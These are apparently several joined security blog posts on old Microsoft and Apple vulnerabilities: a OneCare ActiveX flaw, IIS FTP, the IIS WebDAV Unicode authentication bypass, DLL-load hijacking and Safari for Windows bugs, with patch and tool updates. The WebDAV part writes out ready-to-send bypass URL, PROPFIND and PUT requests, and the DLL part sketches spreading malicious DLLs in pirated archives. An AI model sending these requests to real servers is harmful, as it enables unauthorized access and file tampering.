Description:
A vulnerability has been found in Microsoft Windows Live Safety Center (OneCare) which allows an attacker to download and execute files (executables) to a victim machine.
User interaction is required to exploit this vulnerability. A user must open a local HTML file which initializes the Windows Live Safety Center ActiveX control (wlscCore.dll) and abuse the OneCareInstall() property to download and execute a file.
This vulnerability can only be exploited locally due to the safe for initialization and safe for scripting settings of the vulnerable ActiveX control, which are both set to False. This means exploitation is possible only from Local Machine Zone.
This vulnerability can be useful in various scenarios. For example, in a scenario when attacking a user via email, in the presence of an anti-virus system on the mail server which drops malicious content (such as executables), this exploit can come handy.

wlscCore.dll ActiveX details:
File: C:\Program Files\Windows Live Safety Center\wlscCore.dll
GUID: 55265A35-B335-44FE-BFB4-854E3461004D
Version: 1.12.6087.1
Safe for Script: False
Safe for Init: False
KillBitSet: False

Exploit successfully tested on the following platforms:
– Internet Explorer 6, Windows XP SP2
– Internet Explorer 7, Windows XP SP3
– Internet Explorer 8, Windows XP SP3

Credit:
Trancer of Recognize-Security (www.rec-sec.com)

Exploit – onecare_exploit.html

Mati Aharoni (muts) posted on the BackTrack blog a better version of the exploit. His exploit use the password value to store the payload which allows to store a larger payload – Microsoft IIS FTP 5.0 Remote SYSTEM Exploit.

Also, Xavier Mertens posted an Nmap script to scan potentially vulnerable hosts. The script check if the remote host runs Microsoft ftpd, check if anonymous login are allowed and if the MKDIR command is enabled (all the parameters needed for exploitation) – Detecting Vulnerable IIS-FTP Hosts Using Nmap.

I’ll keep this post up to date with interesting resources and further details about this vulnerability.

Updates:

>> HD Moore added a coverage for this vulnerability the Metasploit SVN tree – microsoft_ftpd_nlst.rb.

>> Kingcope also posted a Denial-of-Service (Stack Exhaustion) exploit which affects IIS 5.0, 5.1 and 6.0 FTP server on milw0rm and exploit-database #9587.

>> Thierry Zoller wrote an overview of the vulnerability on G-SEC blog – IIS 5 & IIS 6 FTP vulnerability – information and tools.

>> Microsoft issued a security advisory (975191) for this vulnerability and posted an informative post on the SRD blog – New vulnerability in IIS5 and IIS6.

>> Microsoft patched this vulnerability – MS09-053.

This reminds me of the good old Microsoft IIS 4/5 Unicode vulnerability, which was used to mass-own the Internet back in 2000-2001, what a fun vulnerability it was ^_^.

Microsoft have released a security advisory (971492) and the SRD team published two posts clearing a lot of this vulnerability details:
More information about the IIS authentication bypass.
Answers to the IIS WebDAV authentication bypass questions.

Here’s a summary of the details so far:

• Microsoft IIS 5.0 (Windows Server 2000), IIS 5.1 (Windows XP) and IIS 6.0 (Windows Server 2003) are vulnerable.
• Microsoft IIS 7.0 (Windows Server 2008) is safe.
• To exploit this vulnerability, WebDAV service must be enabled.
• WebDAV is disabled by default in IIS 6.0.
• To exploit this vulnerability, IIS server must use IIS permissions to restrict a subfolder of content to authenticated users.
• IIS server that doesn’t use IIS permissions to restrict content to authenticated users is safe.
• To exploit this vulnerability, file system access must be granted for the restricted content to the IUSR_[MachineName] account.
• IIS server that does not grant filesystem access to the IUSR_[MachineName] account is safe.
• A parent folder of the private subfolder must allow anonymous access.
• The vulnerability effects websites implementing basic, digest, or integrated windows authentication (NTLM).
• IIS server that hosts web applications using only forms-based authentication is safe.
• If the IUSR_[MachineName] account has write access to WebDAV folders, it is possible to upload content to the web server.
• Microsoft SharePoint Server is safe.
• Microsoft Outlook Web Access (OWA) Server is safe.

Exploiting the WebDAV remote authentication bypass vulnerability

Authentication bypass of password protected folders:
http://www.vulnerable.com/webdav%c0%af/sensitive.zip

Directory listing of password protected folders:
PROPFIND /web%c0%afdav/ HTTP/1.1
Host: www.vulnerable.com
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>

Writing files to password protected folders:
PUT /web%c0%afdav/foo.html HTTP/1.1
Host: www.vulnerable.com
Translate: f
Content-Length: 15
Content-Type: text/html

<h1>w00t!!</h1>

Testing tools

• Metasploit added ms09_020_webdav_unicode_bypass.rb to detect vulnerable IIS6 WebDAV Unicode bypass folders.
• Ron wrote a script for Nmap to detect vulnerable IIS6 WebDAV servers – script http-iis-webdav-vuln.nse.

Further information

• Thierry Zoller wrote a great post covering most of the vulnerability details, updating in real time – Secdev – IIS 6 / IIS 5 / IIS 5.1+ Webdav auth bypass.
• Great writeup by Ron Bowes and Andrew Orr from SkullSecurity – WebDAV Detection, Vulnerability Checking and Exploitation.
• A video by Kingcope demonstrating the vulnerability on milw0rm – IIS WebDAV Vulnerability in Action.
• SecurityFocus advisory – BID 34993.
• US-CERT Vulnerability Note VU#787932 – VU#787932.

That’s it for now, great find by kcope indeed.

Updates:

>> Check out this blog post by Todd Manning of BreakingPoint Labs – ‘Slash’ and Burn – The IIS 6.0 WebDAV Bug – Gives interesting information about this vulnerability and IDS/IPS signature evasion techniques.
In addition, ET added an HTTP WebDAV Scanner to Metasploit – wmap_dir_webdav_unicode_bypass.rb.
From SANS ISC Diary – IIS admins, help finding WebDAV remotely using nmap.

>> From Thierry Zoller – the IIS WebDAV Unicode vulnerability also allows to bypass IP address and domain name restrictions configurations. This keeps getting better and better… :-)

>> WebDAV unicode vulnerability overview by Steve Friedl – Understanding Microsoft’s KB971492 IIS5/IIS6 WebDAV Vulnerability.

>> Microsoft patch IIS WebDAV Unicode authentication bypass vulnerability – MS09-020.
It’s about time.

So why Microsoft did patch a security bug after two and a half years? Well, that’s a long story.
At first, Microsoft issued this vulnerability as a “bad behavior” bug and although Aviv’s warnings they didn’t relate any security considerations to this issue. Microsoft stated that if an attacker was able to create a specially crafted DLL file on a user desktop, that desktop must have already been compromised. Then on December 2006, Aviv published a PoC exploit code (exploit-database #2929) for the vulnerability on milw0rm and still, no patch from Microsoft. Even on April 2008 when Windows XP SP3 was released, Microsoft hasn’t provided a solution or a workaround of any kind for this issue.

On May 2008, Nitesh Dhanjani detailed several vulnerabilities found in Apple Safari, one of them was the “Safari Carpet Bomb” vulnerability, which enabled an attacker to force the browser to download files without the user’s consent. The default download path of Apple Safari for Windows is the user desktop.
Combining the DLL-load hijacking vulnerability and the Safari Carpet Bomb vulnerability, Aviv was able to prove a fully automated remote code execution attack. With the help of Ryan Naraine, Microsoft and Apple started taking these issues seriously after the two sent Microsoft the proof-of-concept. Microsoft released a security advisory for this “blended threat” and eventually on June 2008, Apple fixed the Safari Carpet Bomb vulnerability.
And then on April 2009, two and a half years after Aviv reported this issue, Microsoft finally patched the DLL-load hijacking vulnerability.
You can read a detailed disclosure timeline on this blog post by Aviv Raff. Further information regarding this “blended threat” can be found on CVE-2008-2540 and BID 29445.

To mitigate this issue, Microsoft released two patches:
MS09-014 – which is a cumulative security update for Internet Explorer. Regarding the DLL-load hijacking vulnerability, this patch modifies the way Internet Explorer loads files from the desktop.
MS09-015 – providing additional defense in depth protections, with this patch Microsoft introduced a new API – SetSearchPathMode which sets the per-process mode when using the SearchPath function to locate files, allows applications to force the current directory to be searched after the application and system locations.
Additional information about these patches can be found in the security bulletins and in this post on the Microsoft Security Research & Defense blog.

And now for the interesting part, what Microsoft DON’T want you to know.
As stated on the MS09-014 security bulletin, the DLL-load hijacking vulnerability affects Internet Explorer 7 and lower versions. Internet Explorer 8 users are immune to this vulnerability, Microsoft claims.
This statement is not true, Internet Explorer 8 (RTM, build 8.0.6001.18702) is, in fact, vulnerable to the DLL-load hijacking vulnerability. Not only that, this is not the only vulnerability patched in MS09-014 that affect Internet Explorer 8, but that’s a subject for another blog post.
Here’s a video demonstrating the attack on IE8 – ie8_dll_hijack.swf.

Also, Internet Explorer is not the only application vulnerable to the DLL-load hijacking vulnerability. Almost every Microsoft application I’ve tested is vulnerable and also some third party applications. For example, Microsoft Office 2007 is vulnerable.
Here’s a video demonstrating the attack on Microsoft Office Word 2007 – office_dll_hijack.swf.

As I mentioned, at first Microsoft didn’t consider this issue to be a security vulnerability due to the fact that an attacker would have to create a specially crafted DLL file on a user’s computer to exploit it. Well, I can come up with many ways to leverage this attack, for example, using P2P file sharing applications and protocols, such as BitTorrent. Attackers can distribute warez (movies, software, books and etc’) packed to a ZIP or a RAR file, add to the package a malicious DLL file and a readme .html or .doc file (or both). Once the victim downloads the malicious package and opens the readme file – GAME OVER.

So, does Microsoft lie in security bulletins to their customers? They probably are… Have a happy Black Tuesday! :-)

Update (25/08/2010):
Thanks to HD Moore, the DLL-Load Hijacking is getting a lot of media attention and tons of new exploits are published:
– Microsoft Security Advisory (2269637) – Insecure Library Loading Could Allow Remote Code Execution
– Metasploit: Exploiting DLL Hijacking Flaws
– Better, Faster, Stronger: DLLHijackAuditKit v2
– DLL-Load Hijacking\Binary Planting on Exploit-Database
– DLL Hijacking (KB 2269637) – the unofficial list

Today, Apple released the first beta of Safari 4 (528.16) and I won’t be surprised to see tons of new vulnerabilities published in the next few weeks.
So why do I have a deja vu feeling? I just found a NULL pointer deference bug in the new Safari, just like the previous one I’ve found.
The vulnerabilities are almost the same, only on the last one was with the feed: URI and the new one is with feeds: with a few tweaks.
Check it out:
Apple Safari 4 feeds: URI NULL Pointer Dereference Denial of Service Vulnerability

Also on:
BID 33909

This post will be updated with further vulnerabilities to rise.

1. Apple Safari for Windows Unspecified Denial of Service Vulnerability by Aviv Raff (Bugtraq ID: 24431).
2. Apple Safari for Windows Memory Corruption Vulnerability by David Maynor (Bugtraq ID: 24433).
3. Apple Safari for Windows URL Protocol Handler Command Injection by Thor Larholm (Bugtraq ID: 24434).
4. Apple Safari for Windows Unspecified SVG Parse Engine Multiple Unspecified Vulnerabilities by Tom Ferris (Bugtraq ID: 24446).
5. Apple Safari for Windows Window.setTimeout Content Spoofing Vulnerability by Robert Swiecki (Bugtraq ID: 24457 – PoC).
6. Apple Safari for Windows “ROWSPAN” Denial of Service (Null Pointer) Vulnerability by Yannick von Arx (Bugtraq ID: 17674 – PoC, PoC).
7. Apple Safari Password Manager Cross-Site Information Disclosure Weakness (Reverse Cross-Site Request) by David Teare (Bugtraq ID: 21329 – PoC).
8. Apple Safari for Windows Content and URL Bar Spoofing Vulnerability by Robert Swiecki (Bugtraq ID: 24484 – PoC).
9. Apple Safari for Windows Corefoundation.DLL Denial of Service Vulnerability by Lostmon (Bugtraq ID: 24497 – PoC).
10. Apple Safari for Windows Document.Location Denial of Service Vulnerability by azizov@itdefence.ru (Bugtraq ID: 24499 – PoC).
11. Apple Webkit Invalid Type Conversion Remote Code Execution Vulnerability by Rhys Kidd (Bugtraq ID: 24597).
12. Apple WebCore XMLHTTPRequest Cross-Site Scripting Vulnerability by Richard Moore of Westpoint Ltd (Bugtraq ID: 24598).
13. Apple Safari Cross-Domain Race Condition Information Disclosure Vulnerability by Lawrence Lai, Stan Switzer, Ed Rowe of Adobe Systems (Bugtraq ID: 24599).

Cool ain’t it? Here’s my 2 cents –

Apple Safari for Windows feed:// URI Denial of Service Vulnerability.

(click to enlarge)
Also on:
BID 24460
OSVDB 38864

Stay tuned for more updates.

UPDATE:
SecurityFocus – Flaw hunters go off on Safari

UPDATE 2:
14/06/2007 – Apple has released a new version of Safari for Windows – v3.0.1 Beta, check the security announcement.
There are additional vulnerabilities that has disclosed and reported to Apple, and hasn’t been fixed.

Fixed vulnerabilities:

• Bugtraq ID: 17674
• Bugtraq ID: 24431
• Bugtraq ID: 24433
• Bugtraq ID: 24434
• Bugtraq ID: 24446
• Bugtraq ID: 24457

Unfixed vulnerabilities:

• Bugtraq ID: 21329
• Bugtraq ID: 24460
• Bugtraq ID: 24484
• Bugtraq ID: 24497
• Bugtraq ID: 24499

It’s great that they respond quickly, but what’s the point in releasing a security patch without fixing all vulnerabilities?

UPDATE 3:
22/06/2007 – Apple has released a new version of Safari for Windows – v3.0.2 Beta – security announcement.

Fixed vulnerabilities:

• Bugtraq ID: 24460
• Bugtraq ID: 24484
• Bugtraq ID: 24497
• Bugtraq ID: 24499
• Bugtraq ID: 24597
• Bugtraq ID: 24598
• Bugtraq ID: 24599

Unfixed vulnerabilities:

• Bugtraq ID: 21329

Apple fixed the feed:// URI DoS (NULL pointer deference) vulnerability, found by us. Mentioned in the release notes.
Note that Safari 3.0.2 still vulnerable to the Reverse Cross-Site Request flaw, found by David Teare.